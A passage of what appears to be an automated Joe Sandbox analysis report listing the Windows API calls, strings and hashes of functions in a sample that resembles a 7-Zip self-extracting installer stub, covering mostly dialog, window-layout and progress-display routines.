                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                    • String ID:
                                                    • API String ID: 1057135554-0
                                                    • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                    • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                    • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                    • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                    APIs
                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                    • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                    • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                    • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                    • GetSystemMetrics.USER32(00000007), ref: 004073F4
                                                    • GetParent.USER32(?), ref: 00407418
                                                    • GetClientRect.USER32(00000000,?), ref: 0040742A
                                                    • ClientToScreen.USER32(?,?), ref: 0040743D
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
                                                    • GetClientRect.USER32(?,?), ref: 0040753D
                                                      • Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
                                                      • Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB
                                                    • ClientToScreen.USER32(?,?), ref: 00407446
                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                    • GetSystemMetrics.USER32(00000008), ref: 004075C2
                                                    • GetSystemMetrics.USER32(00000007), ref: 004075C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                    • String ID:
                                                    • API String ID: 747815384-0
                                                    • Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                    • Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
                                                    • Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
                                                    • Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,004193C0,00000000), ref: 00403489
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,004193C0,00000000), ref: 00403491
                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?), ref: 004036B7
                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                    • ??3@YAXPAX@Z.MSVCRT(0040470C,?,?,00000000,00000000,004193C0,00000000), ref: 004036E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID: 0VA$SetEnvironment${\rtf
                                                    • API String ID: 613200358-2390373888
                                                    • Opcode ID: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
                                                    • Instruction ID: 87565cb6d8bbb35d5cc273a3f84cdf02fa03a2bcc309534b5b5a97bb7c5f0c64
                                                    • Opcode Fuzzy Hash: d2b1c421a04f985f795d6f716a120d89dd10d32365d08795990d937a98e965f4
                                                    • Instruction Fuzzy Hash: 9891BD31D00208BBDF21AFA1DD51AEE7BB8AF14309F20407BE841772E1DA795B06DB49
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                    • String ID:
                                                    • API String ID: 801014965-0
                                                    • Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                    • Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
                                                    • Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
                                                    • Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00407831
                                                    • GetWindowLongW.USER32(00000000), ref: 00407838
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
                                                    • GetSystemMetrics.USER32(00000031), ref: 0040787D
                                                    • GetSystemMetrics.USER32(00000032), ref: 00407884
                                                    • GetWindowDC.USER32(?), ref: 00407896
                                                    • GetWindowRect.USER32(?,?), ref: 004078A3
                                                    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
                                                    • ReleaseDC.USER32(?,00000000), ref: 004078DF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                    • String ID:
                                                    • API String ID: 2586545124-0
                                                    • Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                    • Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
                                                    • Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
                                                    • Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9
                                                      • Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
                                                    • wsprintfA.USER32 ref: 00403C31
                                                    • wsprintfA.USER32 ref: 00403C5E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@$wsprintf
                                                    • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                    • API String ID: 2704270482-695273242
                                                    • Opcode ID: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
                                                    • Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
                                                    • Opcode Fuzzy Hash: 9ae0ee48d956ebc158ea1b515db1e5daa1460f0fae3ddab712f6acd0183a952e
                                                    • Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99
                                                    APIs
                                                    • GetDlgItem.USER32(?,000004B3), ref: 0040703C
                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
                                                    • GetDlgItem.USER32(?,000004B4), ref: 00407059
                                                    • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
                                                    • GetDlgItem.USER32(?,?), ref: 0040707A
                                                    • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
                                                    • GetDlgItem.USER32(?,?), ref: 0040708B
                                                    • SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ItemMessageSend$Focus
                                                    • String ID:
                                                    • API String ID: 3946207451-0
                                                    • Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                    • Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
                                                    • Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
                                                    • Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
                                                    • GetWindow.USER32(?,00000005), ref: 0040767B
                                                    • GetWindow.USER32(00000000,00000002), ref: 00407691
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: Window$AddressLibraryLoadProc
                                                    • String ID: hA$SetWindowTheme$uxtheme
                                                    • API String ID: 324724604-1539679821
                                                    • Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                    • Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
                                                    • Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
                                                    • Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC
                                                    APIs
                                                    • memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
                                                    • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
                                                    • GetDC.USER32(00000000), ref: 004076E7
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
                                                    • MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
                                                    • ReleaseDC.USER32(00000000,?), ref: 00407710
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00407738
                                                    • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                    • String ID:
                                                    • API String ID: 2693764856-0
                                                    • Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                    • Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
                                                    • Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
                                                    • Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69
                                                    APIs
                                                    • GetDC.USER32(?), ref: 0040721C
                                                    • GetSystemMetrics.USER32(0000000B), ref: 00407238
                                                    • GetSystemMetrics.USER32(0000003D), ref: 00407241
                                                    • GetSystemMetrics.USER32(0000003E), ref: 00407249
                                                    • SelectObject.GDI32(?,?), ref: 00407266
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
                                                    • SelectObject.GDI32(?,?), ref: 004072A7
                                                    • ReleaseDC.USER32(?,?), ref: 004072B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                    • String ID:
                                                    • API String ID: 2466489532-0
                                                    • Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                    • Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
                                                    • Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
                                                    • Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
                                                    • GetDlgItem.USER32(?,000004B8), ref: 004081EE
                                                    • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
                                                    • wsprintfW.USER32 ref: 0040821E
                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                    • String ID: %d%%
                                                    • API String ID: 3753976982-1518462796
                                                    • Opcode ID: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
                                                    • Instruction ID: c98f75f04a9c9230d8836c9ffda7361431c24c45b39ddc8f7b463edf0082575f
                                                    • Opcode Fuzzy Hash: 42cd89c95a49925efe798b81d99ff8d4be5088a633c9ff9fdeeda3677ef6b080
                                                    • Instruction Fuzzy Hash: F7319171900704FBCB159F60DD45EDA7BB9FF48704F10806EFA46662E1CB75AA11CB68
                                                    APIs
                                                    • EndDialog.USER32(?,00000000), ref: 004083C7
                                                    • KillTimer.USER32(?,00000001), ref: 004083D8
                                                    • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408402
                                                    • SuspendThread.KERNEL32(00000294), ref: 0040841B
                                                    • ResumeThread.KERNEL32(00000294), ref: 00408438
                                                    • EndDialog.USER32(?,00000000), ref: 0040845A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: DialogThreadTimer$KillResumeSuspend
                                                    • String ID:
                                                    • API String ID: 4151135813-0
                                                    • Opcode ID: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                    • Instruction ID: a6440e5942dbc82c6b0340cb4ae65663e5addf35b072ffdb2faf6fa56e3ea6cc
                                                    • Opcode Fuzzy Hash: 35681ac8209b8d1f5ee70de779bcd553034dbd3016c3fd281c537b84293da185
                                                    • Instruction Fuzzy Hash: 59119171200B09EFD7146F61EE94AAB3BADFB81B49704C03EF996A11A1DB355C10DA6C
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00404078
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000,00404622,?,?), ref: 004040B6
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?,00000000), ref: 004040DC
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%M/,0041571C,?,?,?,%%M\,0041572C,?,?), ref: 004040E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID: %%M/$%%M\
                                                    • API String ID: 613200358-4143866494
                                                    • Opcode ID: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
                                                    • Instruction ID: 0aef16b05ee34c363868bff67d8d58263bc671b78327bff7a9d128d2c4d1c409
                                                    • Opcode Fuzzy Hash: 8677c02abf867bd37ca258bec985b4f5904aef2a07f64a71b164819d4d184b46
                                                    • Instruction Fuzzy Hash: AC11F935C0010AFADF05FFA1D993CED7B39AF10308F50812AB915721E1DB7866899B88
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403F02
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000,00404622,?,?), ref: 00403F40
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?,00000000), ref: 00403F66
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%T/,0041571C,?,?,?,%%T\,0041572C,?,?), ref: 00403F6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID: %%T/$%%T\
                                                    • API String ID: 613200358-2679640699
                                                    • Opcode ID: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
                                                    • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                    • Opcode Fuzzy Hash: f3f3d5414f060ac97f84cd4fb4e76d4c066e7be8abca8f8d98a1b02d4c47ed12
                                                    • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID: %%S/$%%S\
                                                    • API String ID: 613200358-358529586
                                                    • Opcode ID: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
                                                    • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                    • Opcode Fuzzy Hash: 328ca1379e14b8368c30dedf60bee0167d5db9aa9a8115ce74c1d677a53725c7
                                                    • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                    APIs
                                                    • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                    Similarity
                                                    • API ID: ExceptionThrow
                                                    • String ID: XkA$XkA$`lA$plA$xmA$xmA
